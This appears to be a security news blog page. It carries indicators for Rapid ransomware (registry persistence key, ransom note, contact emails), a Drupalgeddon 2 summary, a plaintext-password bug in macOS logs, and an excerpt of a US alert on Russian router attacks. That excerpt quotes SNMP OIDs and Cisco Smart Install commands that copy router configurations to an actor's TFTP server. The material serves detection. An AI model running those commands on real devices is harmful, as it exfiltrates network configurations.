HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "userinfo"="%AppData%\recovery.txt"

Rapid Ransomware Email Addresses:

frenkmoddy@tuta.io
jpcrypt@rape.lol
support@fbamasters.com
unlockforyou@india.com
rapid@rape.lol
fileskey@qq.com
fileskey@cock.li

Rapid Ransomware Ransom Note:

Hello!
All your files have been encrypted by us
If you want restore files write on e-mail - frenkmoddy@tuta.io

Will Not Encrypt Data on PCs with Russian Locale

This new version has not suffered any major modifications compared to its previous release, but small changes have occurred.

The biggest is the addition of a code routine that detects the user's PC locale settings before launching encryption operations. If the user has locale settings set to Russian, the ransomware will not encrypt files.

17.04.2018 13:15

Uncovering Drupalgeddon 2

By Eyal Shalev, Rotem Reiss and Eran Vaknin

Abstract

Two weeks ago, a highly critical (25/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.

Drupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.

Until now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.

Continue here.

17.04.2018 12:58

Alert (TA18-106A) Russian State-Sponsored Cyber Actors

Surprise, surprise, if you open ports on your routers towards the Internet, YOU ARE VULNARABLE ! ! !

DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices—coupled with a Russian government campaign to exploit these devices—threatens the safety, security, and economic well-being of the United States.

The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.

Continue reading the advisory here.

Stage 1: Reconnaissance

Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning include

Telnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),
Hypertext Transport Protocol (HTTP, port 80),
Simple Network Management Protocol (SNMP, ports 161/162), and
Cisco Smart Install (SMI port 4786).

Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.

Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.

Whatch out for below attributes being access from the Internet:

SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “80.255.3.85”
SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs) Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “87.120.41.3” and community strings of ”public” ”private” or ”anonymous”

OID Name	OID Value	Meaning
1.3.6.1.4.1.9.9.96.1.1.1.1.2	1	Protocol type = TFTP
1.3.6.1.4.1.9.9.96.1.1.1.1.3	1	Source file type = network file
1.3.6.1.4.1.9.9.96.1.1.1.1.4	4	Destination file type = running config
1.3.6.1.4.1.9.9.96.1.1.1.1.5	87.120.41.3	TFTP server IP = 87.120.41.3
1.3.6.1.4.1.9.9.96.1.1.1.1.6	backup	File name = backup
1.3.6.1.4.1.9.9.96.1.1.1.1.14	4	Activate the status of the table entry

SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85
SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter “87.120.41.3”, using community strings “private” and “anonymous”
The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.
Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.
Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of “public”. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.
SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs
- 210.245.123.180

Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:

copy nvram:startup-config flash:/config.text
copy nvram:startup-config tftp://[actor address]/[actor filename].conf

In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.

copy system:running-config flash:/config.text
copy flash:/config.text tftp://[ actor address]/[actor filename].conf

11.04.2018 20:49

Uh Oh! Unified Logs in High Sierra (10.13) Show Plaintext Password for APFS Encrypted External Volumes via Disk Utility.app

Sarah Edwards found out:

UPATE TO THE UPDATE: Similar log entries are now found in another system log that is more persistent, see the article here.

UPDATE: This is still vulnerable on current versions of macOS 10.13.3 when encrypted an ALREADY EXISTING unencrypted APFS volume (versus, creating a NEW volume in original article). Thanks to @moelassus for pointing this out and to @howardnoakley for verifying. My verification test is below. Note that it gets stored in on-disk, collected logs (non-volatile logs).

It may not be noticeable at first (apart from the highlighting I’ve added of course), but the text “frogger13” is the password I used on a newly created APFS formatted FileVault Encrypted USB drive with the volume name “SEKRET”. (The new class images have a WarGames theme, hence the shout-outs to classic video games!)

Read the complete article of Sarah here.